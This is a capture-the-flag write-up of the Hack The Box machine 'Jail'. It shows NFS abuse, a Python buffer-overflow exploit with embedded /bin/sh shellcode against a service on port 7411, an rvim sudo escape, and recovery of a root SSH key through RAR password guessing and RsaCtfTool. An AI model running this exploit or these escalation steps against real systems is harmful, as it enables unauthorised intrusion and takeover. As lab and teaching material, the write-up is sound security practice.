Jail(HTB)

21 Feb 2018 • Writeup


OS Linux
IP: 10.10.10.34

Nmap:-

root@kali:~/Desktop# nmap -sS -A 10.10.10.34

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-20 22:26 EST
Nmap scan report for 10.10.10.34
Host is up (0.17s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:ec:19:7c:da:dc:16:e2:a3:9d:42:f3:18:4b:e6:4d (RSA)
| 256 af:94:9f:2f:21:d0:e0:1d:ae:8e:7f:1d:7b:d7:42:ef (ECDSA)
|_ 256 6b:f8:dc:27:4f:1c:89:67:a4:67:c5:ed:07:53:af:97 (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/udp nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/udp mountd
| 100021 1,3,4 42049/tcp nlockmgr
| 100021 1,3,4 57851/udp nlockmgr
| 100024 1 50323/udp status
| 100024 1 57733/tcp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.8 (91%), Linux 3.18 (91%), Linux 3.2 - 4.8 (91%), Crestron XPanel control system (89%), Linux
3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), AXIS 210A or 211
Network Camera (Linux 2.6.17) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 180.47 ms 10.10.14.1
2 180.52 ms 10.10.10.34

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.29 seconds
root@kali:~/Desktop#

Web:-

1
Nothing useful lets bruteforce the directories.

root@kali:~/Desktop# gobuster -e -u http://10.10.10.34/ -t 500 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.34/
[+] Threads : 500
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,200,204
[+] Expanded : true
=====================================================
http://10.10.10.34/jailuser (Status: 301)
=====================================================
root@kali:~/Desktop#


There is another directory named /jailuser let’s open it and check what it has 2
It has 3 files Open Jail.c and analyzed it,In there I found something interesting. It has admin password in it, which we don’t know where to use. 3
And in the below lines it’s showing the port 7411 4
Let’s check and try to connect with it and check what service is running inside it.

root@kali:~/Desktop# nc -v 10.10.10.34 7411
10.10.10.34: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.10.34] 7411 (?) open
OK Ready. Send USER command.
DEBUG ON
OK DEBUG mode on.
USER admin
OK Send PASS command.
PASS 1974jialbreak!
Debug: userpass buffer @ 0xffffd610
Incorrect username and/or password.
ERR Authentication failed.
root@kali:~/Desktop#


With the admin username and password which we got from the jail.c file it accepted the connection, and it gave us the userpass buffer address, maybe we can use this in future.
After roaming on the port 80 and 7411 for some time I couldn’t find anything further, So let’s jump and focus on the 3rd port which we found in the nmap which is port 111, It has nfs open which stands for Network File share let’s enumerate this maybe we could find something interesting in it.
First we need to install rpcbind nfs tool to be able to mount the folder to our local machine, If you already have this then you can jump to the next step.
root@kali:~/Desktop# apt-get install rpcbind nfs-common
Now first do the command showmount with the respective target IP address which will show us the available nfs folders.

root@kali:~/Desktop# showmount -e 10.10.10.34
Export list for 10.10.10.34:
/opt *
/var/nfsshare *
root@kali:~/Desktop#


As you can see the /opt and /var/nfsshare folder are available to mount
Now before we proceed we need to create a user with the uid 1000 in able to read the mounted file, because the shared mount folder is only accessible to the users which has uid 1000

teck@kali:/root/Desktop$ id
uid=1000(teck) gid=1000(teck) groups=1000(teck)
teck@kali:/root/Desktop$ sudo showmount -e 10.10.10.34
Export list for 10.10.10.34:
/opt *
/var/nfsshare *
teck@kali:/root/Desktop$ sudo mount -t nfs 10.10.10.34:/var/nfsshare
/var/nfsshare/ -o nolock
mount.nfs: mount point /var/nfsshare/ does not exist
teck@kali:/root/Desktop$ sudo mkdir /var/nfsshare
teck@kali:/root/Desktop$ sudo mount -t nfs 10.10.10.34:/var/nfsshare
/var/nfsshare/ -o nolock
teck@kali:/root/Desktop$ cd /opt/
teck@kali:/opt$ ls -l
total 0
drwxr-x--- 2 root root 26 Jun 26 2017 logreader
drwxr-xr-x 2 root root 6 Mar 26 2015 rh
teck@kali:/opt$ cd logreader/
teck@kali:/opt/logreader$ ls -la
total 4
drwxr-x--- 2 root root 26 Jun 26 2017 .
drwxr-xr-x 4 root root 33 Jun 25 2017 ..
-rwxr-x--- 1 root root 52 Jun 26 2017 logreader.sh
teck@kali:/opt/logreader$ cat logreader.sh
#!/bin/bash
/bin/cat /home/frank/logs/checkproc.log
teck@kali:/opt/logreader$ ./logreader.sh
/bin/cat: /home/frank/logs/checkproc.log: No such file or directory
teck@kali:/opt/logreader$


And as you can see there is not much information available as the file is just trying to cat the checkproc.log file and nothing else
After trying a lot of stuff, when I tried to connect with port 7411 again and this time when I type OPEN in the end it send me the output OK Jail doors opened, this is weird I really don’t know what this means.

teck@kali:/root/Desktop$ nc -v 10.10.10.34 7411
10.10.10.34: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.10.34] 7411 (?) open
OK Ready. Send USER command.
DEBUG ON
OK DEBUG mode on.
USER admin
OK Send PASS command.
PASS 1974jailbreak!
Debug: userpass buffer @ 0xffffd610
OK Authentication success. Send command.
OPEN
OK Jail doors opened.teck@kali:/root/Desktop$


Now we need to Debugg the C program which we found in the web. 5
After runnig, now connect to the program on local host and input some junk data or preferable lot of A’s to check if we can crash the program and could overwrite the EIP. 6 7
The EIP got overwritten with our A’s that means we can control it.
Now restart the program to find the correct offset 8 9
Using patter create we will generate 50 bytes of junk data which we will put it in password field 10 11
The program stop at 0x413b4141, now find the offset 12
The off-set is 28 now we can proceed to create our python exploit using the available data to gain a shell.

teck@kali:/root/Desktop$ cat jail.py
#!/usr/bin/env python

import socket, sys, telnetlib

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.10.34', 7411))

print s.recv(1024)
s.send("DEBUG")
print s.recv(1024)
s.send("USER admin")
print s.recv(1024)

# https://www.exploit-db.com/exploits/34060/
# Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)
# Buffer address (ffffd610) + Offset (28) = ffffd638
payload = "A"*28 + "\x38\xd6\xff\xff" + "\x90"*10 + "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
s.send("PASS " + payload)
print s.recv(1024)

t = telnetlib.Telnet()
t.sock = s
t.interact()

s.close()
teck@kali:/root/Desktop$


Now save it and run the exploit if all goes right we will gain the shell.

root@kali:~/Desktop# ./jail.py
OK Ready. Send USER command.

OK DEBUG mode on.

OK Send PASS command.

Debug: userpass buffer @ 0xffffd610

id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$


We got the shell as user (nobody)

bash-4.2$ sudo -l
sudo -l
Matching Defaults entries for nobody on this host:
    !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
    LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User nobody may run the following commands on this host:
    (frank) NOPASSWD: /opt/logreader/logreader.sh
bash-4.2$ cd /opt/logreader
cd /opt/logreader
bash: cd: /opt/logreader: Permission denied
bash-4.2$


There is another user which is frank which has access to the file logreader.sh in /opt/logreader which is also shared in NFS, but as a nobody user we cannot access the folder, but if you remeber which the user teck which we created with UID 1000 we can access that folder.
Now we will create a C program to read the User.txt - teck.c 13.1
Now from the nobody shell read the user flag

bash-4.2$ /var/nfsshare/teck /home/frank/user.txt
/var/nfsshare/teck /home/frank/user.txt
********************************

bash-4.2$


Now to root this machine we can follow the same procedure. So first we will generate a ssh key with no password

root@kali:~/.ssh# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:rMWxImLF1VPH3XOiisDxpBmVxexuQsSd9zMOJU9cNn4 root@kali
The key's randomart image is:
+---[RSA 2048]----+
| .+.Boo.o +o|
| . .o B =.+ Bo+|
| o. O.o . B oE|
| . =ooo. o = .|
| o . .oSo . o o |
| . . . +o + . |
| . o |
| |
| |
+----[SHA256]-----+
root@kali:~/.ssh# cat id_rsa.pub
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDd8pdzDw0z7VHnPJOuD4juE7ZJe9hMRRjpf1wtl1EJuELElJuVlqtVgSjo4pCaXQ4t5FKA91SRVQOH/SZkBRe/UtVIV27Gl68CHogL
l+jOd/spoMVgQk3HMSeua7iR5QxUKwxBgIcEun5bBPNT3tM+r66bbsuLurVZSuL2if2izphThB6vtPLa1dxZkbdtp0ZFcVMWVEcUzEJVcl2OrkO8w48BDC5Y/cZqf2Nz5ixV
v14ap3er5tmk0RjT1o/9/pLqQW3ds1/VJTZLjO80fS0kSmysmkek755tg30AknrXQQsLxixd/krQrbNErbKPADpconAGjJDYstqCLhWN7wl5 root@kali
root@kali:~/.ssh#


root.c 15.1
Now compile it and give executable permission like the previous file.
and run the file from nobody shell /var/nfsshare/root
Now before connecting to SSH make sure to add the ssh keys or else it will ask you for password.

root@kali:~/Desktop# ssh-add
Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)
root@kali:~/Desktop# ssh frank@10.10.10.34
The authenticity of host '10.10.10.34 (10.10.10.34)' can't be established.
ECDSA key fingerprint is SHA256:i8ngSBp54+Lz0QCHj6yX+qsYfbMSY4mz5Gh3mNdb9HM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.34' (ECDSA) to the list of known hosts.
[frank@localhost ~]$ id
uid=1000(frank) gid=1000(frank) groups=1000(frank) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[frank@localhost ~]$ sudo -l
Matching Defaults entries for frank on this host:
    !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
    LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User frank may run the following commands on this host:
    (frank) NOPASSWD: /opt/logreader/logreader.sh
    (adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
[frank@localhost ~]$


Now again doing the sudo –l command it gave us that there is a user name adm and we can run the file jail.c using rvim with no password
So run the jail.c file with rvim

16
Now go to the last line and Type :py import pty; pty.spawn(‘/bin/bash’) 17
Then :diffpatch $(sh <&2 >&2) 18
And we got the adm user access 19


Now after searching I found a hidden folder .keys inside /var/adm related to adm and it has 1 note.txt and 1 keys.rar

sh-4.2$ pwd
/var/adm
sh-4.2$ ls -la
total 4
drwxr-x---. 3 root adm 19 Jul 3 2017 .
drwxr-xr-x. 23 root root 4096 Feb 20 22:32 ..
drwxr-x---. 3 root adm 52 Jul 3 2017 .keys
sh-4.2$ cd .keys
sh-4.2$ ls -la
total 8
drwxr-x---. 3 root adm 52 Jul 3 2017 .
drwxr-x---. 3 root adm 19 Jul 3 2017 ..
-rw-r-----. 1 root adm 475 Jul 3 2017 keys.rar
drwxr-x---. 2 root adm 20 Jul 3 2017 .local
-rw-r-----. 1 root adm 154 Jul 3 2017 note.txt
sh-4.2$ cat keys.rar
Rar!ϐs
�t$�@����K[Kd�J3��rootauthorizedsshkey.pubr>����g��:;�_���Ќw�-=��C/��h0s��+�$�:o\�/�c9Ѷ�Rb����_I����#oϋ���{�k\R���I���q"�e��wM���7<0�P>�C�Un7;�̺��̻�<1�IXTG���!x�d�����TZ��=���}������֧�ؐ�^��~-���T:i��ޑ&������aoڣ�AACS[�@��^7���z�|q9�����;��V�?eF� �`����='<Ùnvu��<�mu<�A'ϗ�u]�-�Ǧ@�rr��$����N}���8�%dU#�HQ�2X1�6!�[���*��_.�*ac[]���+L�\Xl�ߏf��R�/?)�(�5b�?�����X)��={@sh-4.2$
sh-4.2$ cat note.txt
Note from Administrator:
Frank, for the last time, your password for anything encrypted must be your last name followed by a 4 digit number and a symbol.
sh-4.2$


There is one more hidden folder inside it .local, and there is hidden file .frank and it has some message which looks like some kind of cipher text, which we can decrypt using and online tool quipqiup 20
Hahaha! Nobody will guess my new password! Only a few lucky souls have Escaped from Alcatraz alive like I did!!!


Now we need to transfer this keys.rar file two our kali machine, so for that I am using base64

sh-4.2$ cat keys.rar | base64 -w0
UmFyIRoHAM+QcwAADQAAAAAAAAALnXQkhEAAgAEAAMMBAAAD7rRLW0tk40odMxgApIEAAHJvb3RhdXRob3JpemVkc3Noa2V5LnB1YnI+qg+QiYZnpO86O3+rX46ki9CMd7+q
CC09p9xDL5gF8Wgwc7mZK9wkiTpvXO4vmmM50barFVJi55jD3l9J8var5iMCb8+Lrpn2e79rXFKzktBJ2e3/cSLUZRSv33cQFk2+9b43PDDjUD6IQ6FVbjc72sy6/8bMu7k8
MYtJWFRHsLTwIXi0ZMrd/vydVFq7vQiUPYbt7H0SscXY4crEf9ann9iQyl6V034tluMZ9VQ6DmkXk53ekSbb3/Ck5/1hb9qj2RpBQUNTW70fQIbDXjcOp+qKerl8cfpDdo7J
DRZbmJBuYd5zgFEASKHrew3spqQ/gZrNO6m/VvI/ZUa6DTmqhguHYKC838c9JzzDmW52daeuPMZtdTz2B0Enz5eBdV2XLbofx6ZA3nIYco6DJMvU9NxOfaLgnTj/JWRVAgUj
oEgQUdcyWDEWoDYh+ARbAfG+qyqRhF8ujgUqYWNbXY8FxMsrTPdcWGz8348OZsMWH9NS5S8/KeIoGZU1YhfpP/6so4ihWCnWxD17AEAHAA==sh-4.2$


Now echo this base64 string in our kali machine and decode it and put into a new file

root@kali:~/Desktop# echo UmFyIRoHAM+QcwAADQAAAAAAAAALnXQkhEAAgAEAAMMBAAAD7rRLW0tk40odMxgApIEAAHJvb3RhdXRob3JpemVkc3Noa2V5LnB1YnI+qg+QiYZnpO86O3+rX46ki9CMd7+qCC09p9xDL5gF8Wgwc7mZK9wkiTpvXO4vmmM50barFVJi55jD3l9J8var5iMCb8+Lrpn2e79rXFKzktBJ2e3/cSLUZRSv33cQFk2+9b43PDDjUD6IQ6FVbjc72sy6/8bMu7k8MYtJWFRHsLTwIXi0ZMrd/vydVFq7vQiUPYbt7H0SscXY4crEf9ann9iQyl6V034tluMZ9VQ6DmkXk53ekSbb3/Ck5/1hb9qj2RpBQUNTW70fQIbDXjcOp+qKerl8cfpDdo7JDRZbmJBuYd5zgFEASKHrew3spqQ/gZrNO6m/VvI/ZUa6DTmqhguHYKC838c9JzzDmW52daeuPMZtdTz2B0Enz5eBdV2XLbofx6ZA3nIYco6DJMvU9NxOfaLgnTj/JWRVAgUjoEgQUdcyWDEWoDYh+ARbAfG+qyqRhF8ujgUqYWNbXY8FxMsrTPdcWGz8348OZsMWH9NS5S8/KeIoGZU1YhfpP/6so4ihWCnWxD17AEAHAA== | base64 -d > keys.rar

root@kali:~/Desktop# cat keys.rar
Rar!ϐs
�t$�@����K[Kd�J3��rootauthorizedsshkey.pubr>����g��:;�_���Ќw�-=��C/��h0s��+�$�:o\�/�c9Ѷ�Rb����_I����#oϋ���{�k\R���I���q"�e��wM���7<0�P>�C�Un7;�̺��̻�<1�IXTG���!x�d�����TZ��=���}������֧�ؐ�^��~-���T:i��ޑ&������aoڣ�AACS[�@��^7���z�|q9�����;��V�?eF� �`����='<Ùnvu��<�mu<�A'ϗ�u]�-�Ǧ@�rr��$����N}���8�%dU#�HQ�2X1�6!�[���*��_.�*ac[]���+L�\Xl�ߏf��R�/?)�(�5b�?�����X)��={@root@kali:~/Desktop#


As you can see the file type is RAR, So we can simply unrar it, The password is (Morris1962!) from the Alcatraz film, as we got this hint from the cipher text.

root@kali:~/Desktop# file keys.rar
keys.rar: RAR archive data, v4, os: Unix
root@kali:~/Desktop# unrar e keys.rar

UNRAR 5.40 freeware Copyright (c) 1993-2016 Alexander Roshal

Extracting from keys.rar

Enter password (will not be echoed) for rootauthorizedsshkey.pub:

Extracting rootauthorizedsshkey.pub OK
All OK
root@kali:~/Desktop# cat rootauthorizedsshkey.pub
-----BEGIN PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQYHLL65S3kVbhZ6kJnpf072
YPH4Clvxj/41tzMVp/O3PCRVkDK/CpfBCS5PQV+mAcghLpSzTnFUzs69Ys466M//
DmcIo1pJGKy8LDrwdpsSjVmvSgg39nCoOYMiAUVF0T0c47eUCmBloX/K8QjId6Pd
D/qlaFM8B87MHZlW1fqe6QKBgQVY7NdIxerjKu5eOsRE8HTDAw9BLYUyoYeAe4/w
Wt2/7A1Xgi5ckTFMG5EXhfv67GfCFE3jCpn2sd5e6zqBoKlHwAk52w4jSihdzGAx
I85LArqOGc6QoVPS7jx5h5bK/3Oqm3siimo8O1BJ+mKGy9Owg9oZhBl28CfRyFug
a99GCw==
-----END PUBLIC KEY-----
root@kali:~/Desktop#


The rootauthorizedsshkey.pub is still encrypted,And it’s RSA so we can use a RSAtool to decrypt it and then connect it to SSH as root.

root@kali:~/Downloads/RsaCtfTool-master# ./RsaCtfTool.py --publickey /root/Desktop/rootauthorizedsshkey.pub --private > /root/Desktop/id_rsa
root@kali:~/Downloads/RsaCtfTool-master# cd /root/Desktop/
root@kali:~/Desktop# chmod 400 id_rsa
root@kali:~/Desktop# ssh -i id_rsa root@10.10.10.34
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]# ls
root.txt
[root@localhost ~]# cat root.txt
********************************
[root@localhost ~]#

~ Hack the World and Stay Noob

Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram

Comments

Related Posts